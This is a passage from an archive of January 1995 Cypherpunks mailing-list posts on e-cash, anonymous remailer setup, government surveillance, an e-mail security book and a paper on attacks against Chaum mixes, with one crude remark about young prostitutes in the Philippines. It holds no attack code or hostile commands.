From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 22 Jan 95 14:19:51 PST
To: rishab@dxm.ernet.in
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <gate.gV0cZc1w165w@dxm.ernet.in>
Message-ID: <Pine.3.89.9501221445.A8848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995 rishab@dxm.ernet.in wrote:
> The Religious Alliance Against Pornography has been holding a biggish 
> conference in Manila; the focus is on child pornography,

These international conferences are usually held in pleasant
tourist spots, and most of the participants usually members
of QUANGOs -- nominally private organizations that directly
or indirectly receive large amounts of government funds.

The major tourist attraction of the Phillipines is of course
the large number of whores available at very cheap prices -- many
of them extremely young.

Now the American religious right receives very little money
from the government (as yet) so I doubt there are too many
US Christian rightists attending the conference.

Both Australia and England have government established
religions, so I expect there was a major turn out from
those two nations.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 22 Jan 95 14:34:16 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "Internetpol"
In-Reply-To: <9501222048.AA09932@snark.imsi.com>
Message-ID: <Pine.3.89.9501221412.A8848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, Perry E. Metzger wrote:
> I spoke with Stuart Baker for a while, during which time he informed
> me that he didn't think the internet could possibly last

I find that most statists on the internet assume that the internet
is some kind of government service.

When they discover that it is not, they wonder how it can possibly
exist, and assume it will soon collapse.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Anthony Wm. Iannotti" <tony@fred.secapl.com>
Date: Sun, 22 Jan 95 11:50:51 PST
To: p.v.mcmahon.rea0803@oasis.icl.co.uk
Subject: test
In-Reply-To: <9412071749.AA07438@getafix.oasis.icl.co.uk>
Message-ID: <Pine.3.89.9501221416.B196708-0100000@fred.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain



   Please ignore & delete. I am a test. (I seem to be cut off from the 
mailing list, possibly by my company's firewall.......)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sat, 21 Jan 95 18:05:54 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <199501220204.PAA29874@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


>> Date: Sat, 21 Jan 1995 15:18:48 +1300
>> From: davidm@iconz.co.nz (David Murray)

>> The best way to underpin the value of ecash is for the issuer to (credibly)
>> undertake to convert it into real money.
>
>  And since I would only make the promise to the few people that I am
>connected to in the debt-trust web, this is doable.  I doubt I could
>convince all of you that I was good for $10, but I bet there are a few
>readers on this list that I *could* convince.  They would be able to
>convince a few others that _they_ are worth $10, etc.

But this, I suggest, is thinking too small, as well as (or, as a consequence)
compromising anonymity somewhat. Which is not to say a central ebank is
necessary -- just that (legally enforceable, audited) IOUs from a corporation
that I knew could pay (because it makes it's living from being able to pay)
would be preferred by me, even if I (my computer) knew that Alice's IOU is
backed by Bob's which is backed by ... Zane's, who I would trust with my
life (since he saved me in a boating accident 7 years ago...).

Of course, the two systems can/should coexist. In fact, they're probably the
same thing at different granularities. An ordinary bank takes deposits
(issues IOU's to depositors) and lends the money out (collects IOU's from
debtors). [The flow of credit is just the flow of debt backwards -- like
current and electrons :-)] People trust bank IOUs because of the portfolio
of IOUs it has collected (a certain mandated number from the Government, 
a certain proportion backed by property etc), and, probably, because it
has received more IOUs than it has issued (so that the IOUs from Donald
Trump and Orange County don't bring the system down...).

On this analysis, the web of debt-trust is just an ultimately distributed
bank. Instead of the bank collecting the ten dollars everyone is good for
(in return for IOUs) and then lending it back out to the system (in return
for IOUs), everyone's individual IOU underpins the system. This seems to
leave the portfolio problem to the distributedness and interlinkicity of 
the e-economy (everyone essentially holds the market portfolio), or up to
the individual to balance. Personally, I would be unhappy to hold my
e-wealth in such a way that it was ultimately underpinned by the IOUs of a
group of people living in California...

>  This system might even dodge the laws governing banking in various
>jurisdictions ... though I doubt it.  It quacks, waddles, and water
>runs off its back...

I don't think the banking laws are such a big problem. [Feel free to 
enlighten me.] The ordinary business of banking involves borrowing money
from people in a special way (deposits) and lending to people, again in
a characteristic way. But it is not simply borrowing and lending -- every
business does that (borrows from banks, and, increasingly, in markets;
lends (extends credit to) customers).

Imagine a corporation that issued bearer bonds, and invested the proceeds
in t-bills (or term deposits, or call accounts). Imagine that the bonds 
(IOUs) were issued at face value, carried no interest, and could be cashed
in by the holder at any time. Imagine further that the bonds were repres-
ented by bytes, and transferable anonymously. That is, the bonds are 
ecash, and the corporation is an ebank.

But it is not a bank-bank. It is not borrowing money in a characteris-
tically bankish way, and it is not lending the money in a characteris-
tically bankish way. It doesn't raise the regulatory/consumer protection/
handholding or multiplier effect/credit expansion problems that
(supposedly) underlie banking supervision regulations. In short, ladies
and gentlemen, it is my submission that it is not, in fact, in the final
analysis, when looked at from all angles in the correct way, at all, a
duck.

Cheers.

D

[Although this doesn't entirely answer your point. I don't think the 
distributed/web of debt-trust system would be a bank, either, although
it might be a credit union. And you would have to pay tax on all those 
IOUs you collected ;-) ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schneier@chinet.chinet.com
Date: Sun, 22 Jan 95 13:24:34 PST
To: cypherpunks@toad.com
Subject: E-Mail Security - New Book
Message-ID: <m0rW9Ow-000jq0C@mailbox.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain



                E-MAIL SECURITY WITH PGP AND PEM:
          HOW TO KEEP YOUR ELECTRONIC MESSAGES PRIVATE

                 ...a new book by Bruce Schneier

                     John Wiley & Sons, 1995
                       ISBN  0-471-05318-X
                             $24.95

The world of e-mail is the world of postcards.  Between you and
your correspondents may lurk a foreign government, a business
competitor, an overzealous law enforcement agency, or even just a
nosy neighbor.  The problem is, all of these potential
eavesdroppers, given fairly simple access tools, can read your
messages as easy as a postal worker can read your postcards.

E-MAIL SECURITY is about protecting electronic mail fm spies,
interlopers, and spoofs--people who may want to destroy, alter,
or just look at your private communications.  The book shows how
you can protect the financial information, contract negotiations,
or personal correspondence you entrust to public or private
networks--and it shows how this protection is available right
now, with free or inexpensive software.

The book discusses PGP and PEM: how they work, how they are
different, and how to choose which one is right for you.


TABLE OF CONTENTS:

Part I:  Privacy and Electronic Mail
     Chapter 1:     The Problem
     Chapter 2:     Encryption
     Chapter 3:     Key Management
     Chapter 4:     Authentication
     Chapter 5:     Certificates
     Chapter 6:     Keeping Your Private Key Private
     Chapter 7:     Odds and Ends
     Chapter 8:     Patents, Governments, and Export Laws

Part II:  Achieving Electronic-Mail Privacy
     Chapter 9:     Requirements and Features
     Chapter 10:    Privacy Enhanced Mail (PEM)
     Chapter 11:    Pretty Good Privacy (PGP)
     Chapter 12:    Comparing PGP and PEM
     Chapter 13:    Attacks Against PGP and PEM

Appendix A:    Pretty Good Privacy

Appendix B:    Privacy Enhanced Mail

*****************************************************************

If you are interested in a copy of E-MAIL SECURITY, please send a
check for $25 + $5 postage (ask for rates abroad) to:

     Bruce Schneier
     730 Fair Oaks Ave
     Oak Park, IL  60302

The book won't be available until at least the end of the month,
so please be patient.

From owner-cypherpunks  Sun Jan 22 13:32:05 1995
Return-Path: <owner-cypherpunks>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sat, 21 Jan 95 18:27:01 PST
To: cypherpunks@toad.com
Subject: Supreme Court, free speech, anon remailers...
Message-ID: <199501220225.PAA01129@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>Nathan Zook wrote:
>
>> I believe, therefore, that both the court and the dissent bode poorly for
>> anonymous encrypted mail.
>
>But anonymous handbills are quite common, posted all over the place
>here in my home town, and the Supreme Court ruled quite properly that
>identities are not required for speech.

I too was concerned by the strong dissent in the anonymous handbill case
posted to the net, largely because I live in a country where we have
inherited the odious British practice of requiring newspapers and other
published material (such as handbills) to carry the name of the printer
and the sponsoring organisation (or sumpin' like that...). Its contemporary
significance is supposed to be as a control for defamation (yes, we still
have strong defamation laws -- good thing too, IMHO, and something cryto/
anonymity may or may not render moot): which is to say turning every
publisher and printer into a censor. [Even more bizarrely, the law requires
newspaper proprietors and editors to swear certain documents and deliver
them to the High Court every year...]

Of course, I have never heard of this particular piece of legislation being
invoked to prosecute someone who hasn't complied, and I've never heard of 
anyone complying. Nevertheless, it is on the books.

It seems to me that it would only take a minor amendment to the US law on
the identification of periodicals that are posted (notice the colophons [?]
in all those newspapers and magazines) to apply to all publications...
A couple of extra words in the definition section and away we go. (It's not
a freedom of speech issue, it's an environmental issue -- all those
handbills cluttering up the landfills... And it would only be fair to treat
the denizens of the information superhypeway equally...).

Things ain't half as safe as you might think.

D.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sat, 21 Jan 95 18:29:39 PST
To: Ben Goren <ben@Music.ASU.Edu>
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
Message-ID: <199501220228.PAA01235@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain



>The "cause" will do much better if the first major association is made
>with something much less controversial. Girl Scout cookies, say. 

This may be what you are referring to, but there was a thread on alt.cp a
while back on introducing cyberspace to the people, and one of the suggest-
ions was a Web page to sell Girl Scout cookies.

Now if we could use anon-remailers and ecash to 'enhance' that idea, just
think of the mainstream publicity...

D.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sun, 22 Jan 95 13:56:35 PST
To: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Subject: Remailer background noise
In-Reply-To: <ab3f26ae01021004e8c7@[137.110.24.249]>
Message-ID: <xri8lKjqRCK0078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Lance,

I just set up a remailer at syrinx@c2.org. I think I remember that you were
somehow generating background noise for the remailers to minimize traffic
analysis could you please provide me with details?

Thanks,

Sam

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
   A man with one watch knows what time it is. A man with two is never sure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 22 Jan 95 12:49:02 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: "Internetpol"
In-Reply-To: <199501222022.MAA14828@netcom7.netcom.com>
Message-ID: <9501222048.AA09932@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> Seriously, there is considerable danger that the growing chorus of
> alarmist nonsense about the Net being used for child porn, for snuff
> films, for weapons secrets deals, etc., will result in the U.S.
> Net.Cops linking up with their European and Asian associates.

I was rather amused at the forum given by the New York City Bar
Association on Clipper. The FBI representative not only trotted out
the four horsemen of the infocalypse -- in order, in a single
sentence! -- but also at one point spoke of snuff films.

He said, in what I found to be the greatest denial of logical thinking
I've seen in years, that he's not ready to give up and say that the
genii is out of the bottle -- as though he could put it back by force
of will.

I spoke with Stuart Baker for a while, during which time he informed
me that he didn't think the internet could possibly last.

> The recent stuff on "international key escrow," a la the conference
> last September, is worrisome.

Dorothy Denning is running another such conference soon.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VACCINIA@UNCVX1.OIT.UNC.EDU
Date: Sun, 22 Jan 95 13:11:10 PST
To: cypherpunks@toad.com
Subject: Smoke & Mirrors
Message-ID: <01HM5ISQ2KTU004H2S@UNCVX1.OIT.UNC.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A friend of mine has a business setting up networks for business's in the 
Baltimore area. He contracts out the security end of the setup to a firm
called "Smoke and Mirrors". They create firewalls and handle encryption
capabilities. I think the company is in the baltimore area, and was 
wondering if anyone on the list has heard of this company? With a name 
like smoke and mirrors I guess they better be good. Anybody know?

Vaccinia@uncvx1.oit.unc.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLyLIZD2paOMjHHAhAQHIuwQAhMdaCsA5j7W/Z/m2VHLeaendI7/JHNGv
qm1hePuz3OolJmYgaWyAODlefcLkaKNapeEh5/xRoleEI8dUWuC+njJKvw6MKkr/
b6b/UbcKpLf/qqpFVuz+BbCnBUIY8iALhCLe832o5yxzAV2GT64Sj5gfjhUa3XVy
5dR4yI51SNc=
=ZvUV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 22 Jan 95 14:37:06 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: "Internetpol"
In-Reply-To: <Pine.3.89.9501221412.A8848-0100000@netcom10>
Message-ID: <9501222236.AA10096@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> On Sun, 22 Jan 1995, Perry E. Metzger wrote:
> > I spoke with Stuart Baker for a while, during which time he informed
> > me that he didn't think the internet could possibly last
> 
> I find that most statists on the internet assume that the internet
> is some kind of government service.
> 
> When they discover that it is not, they wonder how it can possibly
> exist, and assume it will soon collapse.

I got the distinct impression that he didn't know that the internet
was in real use by big companies to conduct their daily affairs. When
I asked him if he'd ever heard of Cisco, he said he hadn't; he seemed
slightly suprised when I explained that it was a Fortune 500 company
that basically did nothing but sell internet routing equipment.

I don't know if the bastards are posing or are legitimately ignorant
but either way they are dangerous.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 22 Jan 95 17:51:22 PST
To: Mark Grant <mark@unicorn.com>
Subject: Re: T.A.Z. on Disk
In-Reply-To: <Pine.3.89.9501201432.A753-0100000@unicorn.com>
Message-ID: <Pine.3.89.9501221728.A1376-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995, Angus Patterson wrote:
> 
> > I also saw another e-book site that had some more of [Bey's] stuff, can't
> > remember what it was though.
 
On Fri, 20 Jan 1995, Mark Grant wrote:
> There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html.

Bey sings the line that good is no different from evil, feeling
is better than thinking, and truth indistinguishable from lies.

Sounds like a pile of crap to me.  Still,  I suppose that feelings
and lies are a poets job.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Sun, 22 Jan 95 18:04:30 PST
To: skaplin@mirage.skypoint.com>
Subject: RE: syrinx remailer up and running
Message-ID: <Chameleon.4.01.950122180415.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Well folks, the syrinx remailer is up and running now. The particulars:
>
>Address: syrinx@c2.org

Could you post the capabilities of this remailer, like cpunk, hash, pgp,
ksub, latent, etc.?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sun, 22 Jan 95 15:28:40 PST
To: carolb@barton.spring.com (Censored Girls Anonymous)
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
Message-ID: <m0rWBhy-0002GdC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> Many companies are already founded on "a web of debt".
> "Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
> (Real Estate Loans)," all come to mind at the moment. They're nicely
> formatted, processed and make even more money for investors as the
> interest rates change.

You are talking about trading mortgage-backed (and other debt-backed)
securities, and what you say can be generalized to bonds and certain
FX contracts as well.  Certainly derivatives often use debt instruments
in their formulation.
 
> So maybe the remailer IOU's, could be traded for the data haven IOU's,
> and so forth. I think someone does have a credit card IOU situation.
> The systems, and precedence for debt trading are there (and interest
> rates are going up again soon, indicated the Fed last week!).

This could work, but you are talking about securities markets, which
do this already.  Selling securities over remailers would be sure to
bring down the wrath of moneyed establishment types... :-)
 
> I just wonder who wants to play "collection agency"?

This is the problem.  Government always ends up playing this role,
and so it reserves the right to decide what it is willing to enforce...
classifying the rest as 'gambling' or some other unenforceable debt...

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Sun, 22 Jan 95 15:40:35 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <gate.gV0cZc1w165w@dxm.ernet.in>
Message-ID: <Pine.BSI.3.91.950122183909.21084A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 23 Jan 1995 rishab@dxm.ernet.in wrote:
> source of most European stuff, and bemoans the fact that too little is spent
> on monitoring traffic, as the war against drugs is considered more important.

What weenies... 

It's a nice metaphor to use, "monitoring traffic".  It sounds like such a 
harmless thing.  Funny how they don't use phrases like "invading 
privacy", "spying", and "searching without a warrant".

					-Anthony





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Sun, 22 Jan 95 19:19:21 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re:  traffic analyzing Chaum's digital mix
Message-ID: <199501230319.AA11008@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From:          Hal <hfinney@shell.portal.com>
>
> I know that the Eurocrypt 89 proceedings had some articles on
> cryptanalyzing Chaum's mixes.  My library has an excellent crypto
> selection but is missing this volume.  Can anyone who has read this say
> whether there is anything in those papers that isn't obvious?

I found a copy of these proceedings in the library today.  There is a
paper titled "How to break the direct RSA-implementation of MIXes"
by Birgit Pfitzmann and Andreas Pfitzmann.
Here is its abstract:

MIXes are a means of untraceable communication based on a public key
cryptosystem as published by David Chaum in 1981 (CACM 24/2 84-88).
	In the case where RSA is used as this cryptosystem directly 
i.e. without composition with other functions (e.g. destroying the
multiplicative structure) we show how the resulting MIXes can be
broken by an active attack which is perfectly feasible in a typical
MIX-environment. 
	The attack does not affect the idea of MIXes as a whole: 
if the security requirements of [Chaum's paper] are concretized 
suitably and if a cryptosystem fulfills them one can implement secure 
MIXes directly.  However it shows that present security notions for
public key cryptosystems, which do not allow active attacks
do not suffice for a cryptosystem which is used to implement MIXes 
directly. 
	We also warn of the same attack and others on further 
possible implementations of MIXes and we mention several implementations
which are not broken by any attack we know.

My interpretation is that PGP-based remailers are not susceptible to
the attack described by this paper.  (Of course, they are currently 
vulnerable to much more trivial ones.)

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyMeCTl0sXKgdnV5AQFoggP/XzBFSyChFgNMrX3gCQSNfOiwHrAEKgpD
a0TGYX9KBRqRd6cdDIdauDzFtPST1XjU/1RpYvlGjKIhOSd60JZwO+7185SJGBM9
q/4cqE/hOiHzB2gaoHiQFySDIkfFTeJdlIiTiS/OjbR5awkMCF+zU8cxPrgWTrxr
/sM1C39O8Cc=
=J20K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 22 Jan 95 16:58:55 PST
To: Harry Bartholomew <bart@netcom.com>
Subject: Call Security (Was: Re: TJOAUC 1-7)
In-Reply-To: <199501221133.DAA20304@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.950122195349.24135E-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, Harry Bartholomew wrote:

>  Call Security / Voice Crypto FAQ                     Neil Johnson

	This guy showed up in sci.crypt back in November of '94, with the 
"Call Security" program. It had some new unknown public-key algorithm in 
it that he had designed himself. He raved about the security of his 
program, and "Why wait for Voice PGP! Secure Voice is here now!". Just to 
show how secure his new algorithm was, he posted a challenge example, and 
asked for people to break it.

	Don Coppersmith posted the answer to the challenge the next
morning. It took thirty lines of Scheme code and about a minute on his
RS/6000. The only reason it took him so long to post it was that he saw 
the challenge at the start of work that day, and not when it was posted 
the night before. :-)

	Insert obligatory warning about snake-oil here.

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sun, 22 Jan 95 19:08:15 PST
To: Johnathan Corgan <cypherpunks@toad.com
Subject: Re: syrinx remailer up and running
In-Reply-To: <Chameleon.4.01.950122180415.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <e9n8lKjqRWEK078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 95 18:02:18 PST, Johnathan Corgan <jcorgan@scruznet.com> wrote:
> (Johnathan Corgan uses PGP)
>
> >Well folks, the syrinx remailer is up and running now. The particulars:
> >
> >Address: syrinx@c2.org
>
> Could you post the capabilities of this remailer, like cpunk, hash, pgp,
> ksub, latent, etc.?

It's one of Sameer's remailers in a box. It's a modification of Hal Finney
and Eric Hughes' code. I believe it supports cpunk, hash and pgp. Here's a
copy of the readme file.

           The Cypherpunks Anonymous Remailer In a Box
                             Version 1.1
             Installer: Sameer <sameer@soda.berkeley.edu>
   Remailer: Eric Hughes & Hal Finney, with minor modifications by Sameer
-----------------------------------------------------------------------------

        This is the remailer in a box installation system. If you'd like
to install a remailer on your c2.org account, just run the install_remail
program found in /usr/local/lib/boxed-remailer.

        The anonymous remailer uses the .forward file to pipe all mail
to the remailer system. If mail to the remailer account is not acted
upon by the remailer software, it goes to wherever mail should go
based on what the .forward file said before the remailer was
installed.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

        Once the remailer is installed run the program "remailer_remove"
which will be installed in ~/bin if you'd like to remove the remailer.
(It's also in /usr/local/lib/boxed-remailer.)
infinity:lib/boxed-remailer 5:41pm [11] >

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
                Architecture is the art of how to waste space.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Acklin <hroller@metronet.com>
Date: Sun, 22 Jan 95 18:42:05 PST
To: cypherpunks@toad.com
Subject: hroller remailer up and running
In-Reply-To: <Chameleon.4.01.950122180415.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <Pine.HPP.3.90.950122203722.23988A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I guess I can now say the same thing. A new Remailer is available 
at hroller@c2.org. It is Cpunk, PGP, Hash, Latent, and Cut, I believe. 
This is one of sameer's Remailer-In-A-Box and should be just about the 
same for all c2.org remailers. If you have any problems please report to 
the same address. Have all mail forwarded to my other accout....


hroller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crawford@scruznet.com (Michael D. Crawford)
Date: Sun, 22 Jan 95 20:52:00 PST
To: cypherpunks@toad.com
Subject: $8M for National ID registry
Message-ID: <199501230451.UAA19990@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


"Anti-immigration bandwagon," San Francisco Examiner, Sunday, 11/22/95, p. A-5:

Amid an article discussing Clinton's effort to beat the Republican's in
keeping out illegal aliens:

"A federal advisory commision recently proposed that the government
establish a computerized register of the names and Social Security numbers
of citizens and aliens authorized to work in the United States, so that
employers could check the immigration status of job applicants."

"Clinton will seek $8.3 million for a pilot program to evaluate the
effectiveness of such a system."

Comforting words, especially given that children are to be assigned Social
Security numbers at birth.

Best Wishes,


Michael D. Crawford
crawford@scruznet.com
crawford@maxwell.ucsc.edu <- Finger me here for PGP Public Key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 21:06:56 PST
To: CRSO.Cypherpunks@canrem.com
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <60.19259.6525.0C1CB25E@canrem.com>
Message-ID: <199501230505.VAA01141@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lloyd-Jones wrote:

>  tcmay@netcom.com (Timothy C. May) sez:
>  
> TM+Crypto and remailers are going to do the same thing to today's
>   +versions of guilds, what we call "licensed professions."
>  
> I've got PGP, therefore I can be a brain surgeon?  Well, yeah, OK.  
> Pediatrician?  Hmmm.  'Nuther bad example.   Proctologist?  Sure.
> How 'bout dentist?
>  
> There's got to be one or two licensed professions you're not thinking 
> of...

I said nothing of the  kind about having PGP making one a brain
surgeon. Think about it.

Here are just a few more examples:

* Law. While anyone can offer free opinions, the U.S. does not allow
non-guild folks to charge money for such advice. And yet there are
many people well-qualified to sell legal advice (former lawyers,
disbarred lawyers, foreigners and those who haven't take the requisite
bar exams, those who failed the bar exam for reason other than
competency, etc.) I also know some just plain bright folks who have
read enough law to sell their advice in certain areas.

(By the way, the "well-qualified" qualifier should not be taken to
assume I believe some people should be able to sell advice and some
should not.)

(The government also regulates advertising, fees, etc.)

* Financial Advice, Accounting, etc. The "Certified Public Account"
and "Licensed Financial Advisor" stuff. 

* Geological. Structural. Architectural. All are areas where the
charging of money for services is regulated in some ways. In most
cases, the guild is that of "Professional Geologist," etc.

* Psychological Counselling. "Licensed Marriage, Family, and Child
Counselor" (LMFCC) is one of the guilds....others are Licensed Social
Worker (LSW) and, of course, M.D.s and Ph.D.s in various clinical
professions.

(Again, I make no claims that having PGP makes one a good
shrink--perhaps just the opposite. I do claim that a market may
develop for online psychological counselling, and that I know some
folks who would make better therapists that some licensed folks I know
(a former girlfriend of mine was an LMFCC). The law allows the LMFCCs
and LSWs to sell their services, and bars me from selling my therapy.)

And so on.

Again, I'm not claiming anything about PGP making conventional doctors
obsolete. Just the increased freedom of a wide range of services to be
negotiated electronically, without benefit of official guild
approvals.

(This is an actual concern the professional organizations have. They
worry about online medical diagnoses, about "unlicensed" consultants,
and about data bases over which they have no jurisdiction.)

I have many more of these points in my FAQ.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Sun, 22 Jan 95 18:20:34 PST
To: Censored Girls Anonymous <carolb@barton.spring.com>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
Message-ID: <Pine.SV4.3.91.950122210340.25763A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 22 Jan 1995, Censored Girls Anonymous wrote:

> Many companies are already founded on "a web of debt".
> "Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
> (Real Estate Loans)," all come to mind at the moment. They're nicely
> formatted, processed and make even more money for investors as the
> interest rates change.

I for one would not want to go in to more debt. I am in debt up to my 
neck due to a auto accident. I can not afford to go in to more debt. I am 
barely making it beacuse I owe on two loans, insurance, and money 
borrowed from relatives. This beacuse I thought I could afford X dollars 
a month more. I could if I wassnt out of work for as long as I was. When 
I have everything paid off, I belive I will not be borrowing anything 
else for a while. My question to you is, "Why borrow, if 1. you can 
afford to pay cash now, and 2. when you are going to have to pay more in 
the long run."

							Groove on Dude
							Michael Conlen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 21:56:21 PST
To: cypherpunks@toad.com
Subject: A Legal Web Page Issue
